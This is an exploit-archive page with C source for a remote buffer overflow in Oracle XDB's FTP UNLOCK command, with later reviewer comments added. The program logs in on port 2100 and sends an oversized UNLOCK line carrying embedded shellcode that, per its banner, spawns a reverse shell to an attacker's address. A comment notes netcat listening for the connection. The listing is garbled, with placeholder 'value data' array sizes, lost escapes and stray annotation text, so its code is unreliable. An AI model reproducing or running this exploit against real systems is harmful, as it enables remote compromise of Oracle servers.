Oracle XDB FTP service UNLOCK buffer overflow

2010-03-23
ID: 66939
CVE: None
Download vulnerable application: None
[+] vulnerability: network-level / stack-based buffer overflow
[+] special network layer attack
[+] implemented over http/XML-db/ftp==>windows XDB
[+] connecting:8080
[=] operation: win 32-->xdb overflow
[+] author mc2_s3lector
[+] yogyacarderlink.web.id/KeDai Computerworks.com


exploit win32
#include <stdio.h>
#include <windows.h>
#include <winsock.h>
   
/* Forward declarations for the three helpers defined below main(). */
int GainControlOfOracle(char *, char *);   /* FTP login on port 2100, then sends exploit_code */
int StartWinsock(void);                    /* Winsock init + resolve `host` into s_sa */
int SetUpExploit(char *,int);              /* patch connect-back IP/port into `exploit` */
   
/* File-scope state shared between main() and the helpers. */
struct sockaddr_in s_sa;   /* target address; filled by StartWinsock(), port set in GainControlOfOracle() */
struct hostent *he;        /* gethostbyname() result, or a dummy non-NULL value for numeric hosts */
unsigned int addr;         /* inet_addr() result for numeric hosts */
/* Target host copied from argv[1] by main() via strncpy(…, 250).  The array
 * size on this page is the placeholder `value data` (not valid C), so the
 * real capacity — and whether 250 leaves room for a terminator — is not
 * recoverable from this listing. */
char host[value data]="";
   
/*
 * Embedded connect-back payload (the usage text in main() describes it as a
 * reverse shell).  SetUpExploit() overwrites bytes inside it with the
 * caller-supplied address and port.  Treat the contents as opaque malicious
 * data — useful as signature material, not something this review reasons
 * about.  As printed on this page the literal is plain text rather than byte
 * escapes and the array size is the placeholder `value data`, so the listing
 * does not compile as shown.
 *
 * Note: the comment line directly below ends in a backslash, which in C
 * splices the next physical line into the comment; the declaration on that
 * line is therefore part of the comment, not code, as written.
 */
//register acces\
unsigned char exploit[value data]=
"x55x8BxECxEBx03x5BxEBx05xE8xF8xFFxFFxFFxBExFFxFF"
"xFFxFFx81xF6xDCxFExFFxFFx03xDEx33xC0x50x50x50x50"
"x50x50x50x50x50x50xFFxD3x50x68x61x72x79x41x68x4C"
"x69x62x72x68x4Cx6Fx61x64x54xFFx75xFCxFFx55xF4x89"
"x45xF0x83xC3x63x83xC3x5Dx33xC9xB1x4ExB2xFFx30x13"
"x83xEBx01xE2xF9x43x53xFFx75xFCxFFx55xF4x89x45xEC"
"x83xC3x10x53xFFx75xFCxFFx55xF4x89x45xE8x83xC3x0C"
"x53xFFx55xF0x89x45xF8x83xC3x0Cx53x50xFFx55xF4x89"
"x45xE4x83xC3x0Cx53xFFx75xF8xFFx55xF4x89x45xE0x83"
"xC3x0Cx53xFFx75xF8xFFx55xF4x89x45xDCx83xC3x08x89"
"x5DxD8x33xD2x66x83xC2x02x54x52xFFx55xE4x33xC0x33"
"xC9x66xB9x04x01x50xE2xFDx89x45xD4x89x45xD0xBFx0A"
"x01x01x26x89x7DxCCx40x40x89x45xC8x66xB8xFFxFFx66"
"x35xFFxCAx66x89x45xCAx6Ax01x6Ax02xFFx55xE0x89x45"
"xE0x6Ax10x8Dx75xC8x56x8Bx5DxE0x53xFFx55xDCx83xC0"
"x44x89x85x58xFFxFFxFFx83xC0x5Ex83xC0x5Ex89x45x84"
"x89x5Dx90x89x5Dx94x89x5Dx98x8DxBDx48xFFxFFxFFx57"
"x8DxBDx58xFFxFFxFFx57x33xC0x50x50x50x83xC0x01x50"
"x83xE8x01x50x50x8Bx5DxD8x53x50xFFx55xECxFFx55xE8"
"x60x33xD2x83xC2x30x64x8Bx02x8Bx40x0Cx8Bx70x1CxAD"
"x8Bx50x08x52x8BxC2x8BxF2x8BxDAx8BxCAx03x52x3Cx03"
"x42x78x03x58x1Cx51x6Ax1Fx59x41x03x34x08x59x03x48"
"x24x5Ax52x8BxFAx03x3Ex81x3Fx47x65x74x50x74x08x83"
"xC6x04x83xC1x02xEBxECx83xC7x04x81x3Fx72x6Fx63x41"
"x74x08x83xC6x04x83xC1x02xEBxD9x8BxFAx0FxB7x01x03"
"x3Cx83x89x7Cx24x44x8Bx3Cx24x89x7Cx24x4Cx5Fx61xC3"
"x90x90x90xBCx8Dx9Ax9Ex8Bx9AxAFx8Dx90x9Cx9Ax8Cx8C"
"xBExFFxFFxBAx87x96x8BxABx97x8Dx9Ax9Ex9BxFFxFFxA8"
"x8CxCDxA0xCCxCDxD1x9Bx93x93xFFxFFxA8xACxBExACx8B"
"x9Ex8Dx8Bx8Ax8FxFFxFFxA8xACxBExACx90x9Cx94x9Ax8B"
"xBExFFxFFx9Cx90x91x91x9Ax9Cx8BxFFx9Cx92x9BxFFxFF"
"xFFxFFxFFxFF";
   
/*
 * The FTP command line sent after a successful login: an UNLOCK request whose
 * argument is filler.  main() later appends short_jump, exception_handler,
 * the payload and a line terminator with unchecked strcat() calls.  On this
 * page the literal's contents are replaced by annotation text ("put
 * character", the arrow note on the fifth line) and the size is the
 * placeholder `value data`, so it is not valid C as printed.
 *
 * From a defender's view this is the observable artefact: an UNLOCK command
 * on the XDB FTP port whose length far exceeds any legitimate path, sent
 * immediately after USER/PASS.
 */
char exploit_code[value data]=
"UNLOCK / put character"
"put character"
"put character"
"put character"
"put character"  --------->char or nummeric-----or combine chart&nummeric
"5eeefffggghhh";
   
/* Two 4-byte values main() splices in between the UNLOCK filler and the
 * payload.  What the vulnerable service does with them is not established by
 * this listing.  As printed they are plain text rather than byte escapes, and
 * the sizes are the placeholder `value dataX`. */
char exception_handler[value dataX]="x79x9Bxf7x77";
char short_jump[value dataX]="xEBx06x90x90";
   

/*
 * Entry point.  Expects exactly five arguments — target host, FTP user id,
 * password, connect-back address and connect-back port (see the usage text);
 * anything else prints the banner and returns 0.
 *
 * Flow: copy the host name into the global `host`; initialise Winsock and
 * resolve the host (StartWinsock); patch the connect-back address/port into
 * the payload (SetUpExploit); build the final command line by appending
 * short_jump, exception_handler, the payload and a line terminator onto
 * exploit_code; then log in and send it (GainControlOfOracle).
 *
 * Review notes:
 *  - strncpy() with a fixed count of 250 does not guarantee NUL termination,
 *    and the four strcat() calls append into exploit_code with no capacity
 *    check; since the array sizes on this page are the placeholder
 *    `value data`, the real bounds cannot be checked from the listing.
 *  - `return printf(...)` yields the number of characters printed, not an
 *    error status.
 *  - The page header says "connecting:8080", but GainControlOfOracle()
 *    connects to port 2100; that is the port this traffic actually uses.
 *  - The string literals on this page have lost their escape backslashes
 *    ("nnt…"), so the banner text is not printed as the author intended.
 */
int main(int argc, char *argv[])
{
     
     if(argc != 6)
     {
          printf("nntOracle XDB FTP Service UNLOCK Buffer Overflow Exploit");
          printf("nntSpawns a reverse shell to specified port");
          printf("nntUsage:t%s host userid password ipaddress port",argv[0]);
          printf("nt6th maret 2010nnn");
          return 0;
     }
   
     /* Fixed count, not sizeof host: may leave `host` unterminated. */
     strncpy(host,argv[1],250);
     if(StartWinsock()==0)
          return printf("Error starting Winsock.n");
   
     /* atoi() silently yields 0 for a non-numeric port argument. */
     SetUpExploit(argv[4],atoi(argv[5]));
   
     /* Assemble: "UNLOCK …filler" + short_jump + exception_handler + payload + CRLF.
      * No bounds check on exploit_code. */
     strcat(exploit_code,short_jump);
     strcat(exploit_code,exception_handler);
     strcat(exploit_code,exploit);
     strcat(exploit_code,"rn");
   
     GainControlOfOracle(argv[2],argv[3]);
          
     return 0;
   
}
   

/*
 * Patch the connect-back IPv4 address and TCP port into the `exploit` payload.
 *
 * myip   - dotted-quad address in text form; converted with inet_addr().
 *          Its failure value (INADDR_NONE) is not checked, so a malformed
 *          address is written into the payload as-is.
 * myport - TCP port; converted to network byte order and then XORed with
 *          0xFFFF before being stored.  The payload presumably undoes the
 *          XOR — not verified here.
 *
 * The destination offsets inside `exploit` appear on this page as the
 * placeholder `value data`, so the exact patch locations are not recoverable
 * from the listing.  Always returns 0.  (The "--->protocol" text on the
 * signature line is annotation that leaked into the listing; it is not C.)
 */
int SetUpExploit(char *myip, int myport)--->protocol
{
     unsigned int ip=0;
     unsigned short prt=0;
     char *ipt="";
     char *prtt="";
   
     ip = inet_addr(myip);   /* INADDR_NONE on malformed input — unchecked */
   
     /* Copy the four address bytes in memory order into the payload. */
     ipt = (char*)&ip;
     exploit[value data]=ipt[0];
     exploit[value data]=ipt[1];
     exploit[value data]=ipt[2];
     exploit[value data]=ipt[3];
   
     // set the TCP port to connect on
     // netcat should be listening on this port
     // e.g. nc -l -p 80
   
     prt = htons((unsigned short)myport);
     prt = prt ^ 0xFFFF;     /* stored inverted; payload is expected to re-invert it */
     prtt = (char *) &prt;
     exploit[value data]=prtt[0];
     exploit[value data]=prtt[1];
   
     return 0;
}
   

/*
 * Initialise Winsock 2.0 and fill the global s_sa with the target address
 * taken from the global `host`.
 *
 * Returns 1 on success, 0 if WSAStartup() fails or reports a version other
 * than 2.0.  The port is not set here (GainControlOfOracle() sets it).
 *
 * Review notes:
 *  - For a host that starts with a letter, gethostbyname() may return NULL,
 *    but `he->h_addr` is dereferenced in that branch before the `he == NULL`
 *    test at the bottom — an unresolvable name crashes instead of returning 0.
 *  - For a numeric host, inet_addr()'s failure value (INADDR_NONE) is not
 *    checked, and `he` is set to a dummy non-NULL value purely so the final
 *    test passes.
 *  - isalpha() is given a plain `char`; for values outside unsigned char
 *    range this is undefined — cast to unsigned char first.
 *  - The `INADDR_ANY` assignments are immediately overwritten by memcpy().
 */
int StartWinsock()
{
     int err=0;
     WORD wVersionRequested;
     WSADATA wsaData;
   
     wVersionRequested = MAKEWORD( 2, 0 );
     err = WSAStartup( wVersionRequested, &wsaData );
     if ( err != 0 )
          return 0;
     if ( LOBYTE( wsaData.wVersion ) != 2 || HIBYTE( wsaData.wVersion ) != 0 )
       {
          WSACleanup( );
          return 0;
     }
   
     if (isalpha(host[0]))
     {
          he = gethostbyname(host);   /* may be NULL … */
          s_sa.sin_addr.s_addr=INADDR_ANY;
          s_sa.sin_family=AF_INET;
          /* … but is dereferenced here before the NULL check below. */
          memcpy(&s_sa.sin_addr,he->h_addr,he->h_length);
       }
     else
     {
          addr = inet_addr(host);     /* INADDR_NONE on bad input — unchecked */
          s_sa.sin_addr.s_addr=INADDR_ANY;
          s_sa.sin_family=AF_INET;
          memcpy(&s_sa.sin_addr,&addr,4);
          he = (struct hostent *)1;   /* dummy non-NULL so the test below passes */
     }
   
     if (he == NULL)
       {
          return 0;
       }
     return 1;
}
   

   
/*
 * Log in to the XDB FTP service on the target (s_sa, port 2100) with the given
 * credentials and then send the assembled exploit_code line.
 *
 * user, pass - FTP credentials; up to 230 characters of each are appended to
 *              "user " / "pass ".
 *
 * Returns 0 after sending (whether or not anything happened on the remote
 * side); on socket/connect failure or a 5xx login reply it returns the result
 * of printf(), i.e. a character count rather than an error status.
 *
 * Wire sequence, which is what a network or host defender can look for:
 * banner read, USER <user>, PASS <pass>, then a single UNLOCK command whose
 * argument is far longer than any legitimate path.  Because a valid login is
 * required, server-side FTP logs should show a successful authentication
 * immediately followed by the oversized UNLOCK (and, if vulnerable, a crash
 * of the listener).  Limiting who can reach port 2100, and disabling the XDB
 * FTP listener where it is not needed, removes the exposure alongside the
 * vendor fix.
 *
 * Review notes:
 *  - strncat()'s third argument is the maximum number of characters to
 *    append, not the buffer size; with the array sizes on this page reduced
 *    to the placeholder `value dataXX`, the bound cannot be checked here.
 *  - send()/recv() return values are stored but never examined; a failed
 *    recv() leaves resp zero-filled, so the printf() calls are at least
 *    bounded (resp is 1600 bytes, recv is capped at 1500).
 *  - r_addr is filled in but never used.
 *  - The "rn" literals have lost their escape backslashes on this page, so
 *    as printed the commands are not CRLF-terminated.
 *  - The string literal in the failure message is split across two physical
 *    lines on this page (extraction damage); it is not valid C as shown.
 */
int GainControlOfOracle(char *user, char *pass)
{
   
     char usercmd[value dataXX]="user ";
     char passcmd[value dataXX]="pass ";
     char resp[1600]="";
     int snd=0,rcv=0;
     struct sockaddr_in r_addr;
     SOCKET sock;
   

     /* Build "user <user>\r\n" and "pass <pass>\r\n" (escapes lost on this page). */
     strncat(usercmd,user,230);
     strcat(usercmd,"rn");
     strncat(passcmd,pass,230);
     strcat(passcmd,"rn");
   

     sock=socket(AF_INET,SOCK_STREAM,0);
     if (sock==INVALID_SOCKET)
         return printf(" sock error");
   
     /* r_addr is never passed to any call below. */
     r_addr.sin_family=AF_INET;
     r_addr.sin_addr.s_addr=INADDR_ANY;        
     r_addr.sin_port=htons((unsigned short)0);
     /* XDB FTP listener port; the page header's "8080" does not match this. */
     s_sa.sin_port=htons((unsigned short)2100);
   
     
     if (connect(sock,(LPSOCKADDR)&s_sa,sizeof(s_sa))==SOCKET_ERROR)
          return printf("Connect error");
   
     /* Server banner; return value of recv() is not checked. */
     rcv = recv(sock,resp,1500,0);
     printf("%s",resp);
     ZeroMemory(resp,1600);
   
    snd=send(sock, usercmd , strlen(usercmd) , 0);
     rcv = recv(sock,resp,1500,0);
     printf("%s",resp);
     ZeroMemory(resp,1600);
   
    snd=send(sock, passcmd , strlen(passcmd) , 0);
     rcv = recv(sock,resp,1500,0);
     printf("%s",resp);
     /* A reply in the FTP 5xx (permanent failure) class means login failed. */
     if(resp[0]=='5')
     {
          closesocket(sock);
          return printf("Failed to log in using user %s and password 
%s.n",user,pass);
     }
     ZeroMemory(resp,1600);
   
     /* The oversized UNLOCK line assembled by main(), sent in one call. */
     snd=send(sock, exploit_code, strlen(exploit_code) , 0);
   
     /* Give the remote side time before the socket is torn down. */
     Sleep(2000);
   
     closesocket(sock);
     return 0;
}


Big thanks to:
================================================================================
indonesian black hat team(www.yogyacarderlink.web.id)
KeDaiComputerworks.com
Jasakom(jasakom.com)
indonesianhacker.org
Indesign Computer Care (INDESIGN)
Indonesian hacker(indonesianhacker.org)
one-day(the-codec),n3r0,elpaciano
================================================================================